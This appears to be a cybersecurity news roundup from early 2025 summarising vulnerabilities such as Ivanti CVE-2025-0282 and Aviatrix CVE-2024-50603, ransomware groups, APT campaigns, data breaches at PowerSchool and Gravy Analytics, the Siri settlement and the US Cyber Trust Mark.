FlagThis

A critical zero-day vulnerability, tracked as CVE-2025-0282, has been discovered in Ivanti Connect Secure, Policy Secure, and Neurons for ZTA gateways. This stack-based buffer overflow allows unauthenticated remote attackers to achieve remote code execution. This is in addition to CVE-2025-0283 which is another stack-based buffer overflow, which requires a local authenticated attacker. This vulnerability is currently being actively exploited in the wild. Organizations are advised to apply the available patches immediately and perform factory resets to ensure complete removal of any potential malware. Ivanti has a long history of being targeted.

A new ransomware campaign is exploiting Amazon Web Services’ (AWS) Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt S3 buckets. The attackers use encryption keys unknown to the victims and demand ransoms for the decryption keys. This attack abuses a legitimate AWS feature, creating a very difficult situation for its victims who cannot recover their data without the decryption key. The ransomware crew has been dubbed ‘Codefinger’.

A sophisticated credit card skimmer malware campaign is targeting WordPress e-commerce checkout pages. The malware injects malicious JavaScript code directly into the database tables, evading traditional detection methods. This allows attackers to steal sensitive payment information, highlighting the need for robust security practices, including database monitoring and regular security audits to protect against such advanced threats.

FunkSec, a rising ransomware group, blurs the lines between cybercrime and hacktivism. This group utilizes AI to develop malware and has quickly gained notoriety by breaching databases and selling access to government websites. They have unusually low ransom demands and operate as a four-member team, indicating a blend of financial and visibility motivations. This group emphasizes the evolving landscape of ransomware and the potential for AI to lower the barrier for new groups to engage in cybercrime. This group is being tracked as an evolving cyber threat. Organizations should implement robust security measures, including network segmentation, data backups and security awareness trainings.

Cybercriminals are using fake job offers with the CrowdStrike brand to distribute a cryptominer, specifically XMRig. This is a social engineering scam where malicious actors pose as legitimate recruiters to trick job seekers into downloading malware.

A critical command injection vulnerability, CVE-2024-50603, in the Aviatrix Network Controller allows unauthenticated remote attackers to execute arbitrary code. This vulnerability, with a CVSS score of 10.0, stems from improper input handling within the Aviatrix Controller’s API. Exploitation could lead to full system compromise, data theft, and network breaches. There are hundreds of publicly exposed Aviatrix Controllers accessible via the Shodan search engine.

A macOS vulnerability (CVE-2024-44243) allows attackers to bypass System Integrity Protection (SIP) by loading third-party kernel extensions. This security feature bypass could allow attackers and malware authors to install rootkits, create persistent malware, and bypass Transparency, Consent, and Control (TCC) mechanisms. Microsoft provided a root cause analysis of this issue.

A campaign, named ‘Console Chaos,’ targets publicly exposed management interfaces on Fortinet FortiGate firewalls. Threat actors gain unauthorized administrative access, create new accounts, establish SSL VPN connections, and make configuration changes. The initial access vector is not yet confirmed, but mass exploitation of a zero-day vulnerability is suspected. The widespread nature of the campaign points to a critical vulnerability impacting many Fortinet devices.

Eindhoven University of Technology (TU/e) suffered a cyber attack, forcing the university to take its network offline. This resulted in a suspension of classes. The university is located near ASML, a key chip manufacturer, raising concerns about the wider impact. The university shut down its computer network as a precautionary measure to mitigate the attack. The network systems were made inaccessible. There is no confirmation yet on data theft.

A massive data breach at location data company Gravy Analytics has exposed sensitive location data of millions of users. The breach affects users of popular apps like Candy Crush, Tinder, and MyFitnessPal, among thousands of others. This incident underscores the risks associated with the collection and sale of location data, particularly from advertising bid streams, without users’ or even app developers’ knowledge. The breach was posted on a Russian-language forum by the hacker using the alias “Nightly” and contained coordinates of devices in the US, Europe, and Russia.

A fake proof-of-concept (PoC) exploit is being used to target security researchers, disguising itself as a fix for a critical Microsoft LDAP vulnerability. The attackers used a forked version of the legitimate PoC and embed information-stealing malware that is deployed when the malicious code is executed. The tactic aims to steal credentials, and other sensitive information from security researchers.

The Chinese state-sponsored group, RedDelta, has been actively targeting Mongolia, Taiwan, and Southeast Asia since July 2023. The group uses evolving cyber threats to distribute its customized PlugX backdoor. RedDelta employs spearphishing techniques with lure documents themed around political and cultural events. They have compromised government and diplomatic organizations in multiple countries using adapted infection chains. The group uses Windows Shortcut (LNK), Microsoft Management Console Snap-In Control (MSC) files, and HTML files hosted on Microsoft Azure. They also use Cloudflare CDN to proxy command-and-control (C2) traffic to blend in with legitimate network activity, complicating victim identification.

The MirrorFace APT, linked to China, has been conducting extensive cyber espionage campaigns against Japan since 2019. The group uses malware delivered via email attachments, and exploits VPN vulnerabilities to steal sensitive information. Targets include the Japanese government, defense, aerospace, semiconductor, communications and research organizations. The group uses tools like ANEL and NOOPDOOR for its attacks. The campaign shows a deep focus on infiltrating Japanese national security and advanced technology sectors.

PowerSchool has disclosed a data breach that has affected both hosted and self-hosted school districts. The breach, discovered on December 28, has led to the compromise of student information, such as grades, attendance, and enrollment data, potentially impacting numerous K-12 districts. Emails were sent to PowerSchool clients. It is not yet known how the breach happened.

Multiple vulnerabilities have been discovered in Palo Alto Networks’ Expedition migration tool, including an OS command injection flaw and a vulnerability that exposes sensitive firewall credentials. These vulnerabilities could allow attackers to execute arbitrary code and access usernames, cleartext passwords, device configurations, and API keys. The vulnerabilities pose a significant risk to organizations using the tool for firewall migration and optimization.

US dental and medical billing firm Medusind is notifying over 360,000 customers that their personal, financial and medical data may have been accessed by a cybercriminal actor. The breach relates to a cyber incident that took place back on December 29, 2023. The compromised information includes names, birthdates, email addresses, phone numbers, Social Security numbers, driver’s licenses, taxpayer IDs, payment details, and health insurance information.

Apple is facing a class-action lawsuit over its Siri voice assistant due to privacy concerns. The lawsuit claims Siri was eavesdropping and recording users without their consent. Apple has agreed to a $95 million settlement to resolve the issue. The settlement impacts millions of users who might have been affected. Some of the recordings have been shared with third parties. Users can disable Siri to avoid being recorded. This settlement highlights the importance of user data privacy and transparency, and it has also resulted in Apple making changes to its Siri privacy policy and functionality.

The White House has launched the Cyber Trust Mark program, a labeling scheme for IoT devices. This program informs consumers that applicable household products meet certain government-vetted cybersecurity standards. The Cyber Trust Mark aims to certify devices’ security, similar to the Energy Star label for energy efficiency. The initiative, coordinated with NIST and FCC, is set to have labeled products on shelves in 2025. This could encourage manufacturers to focus more on cybersecurity, and also help consumers pick safer devices.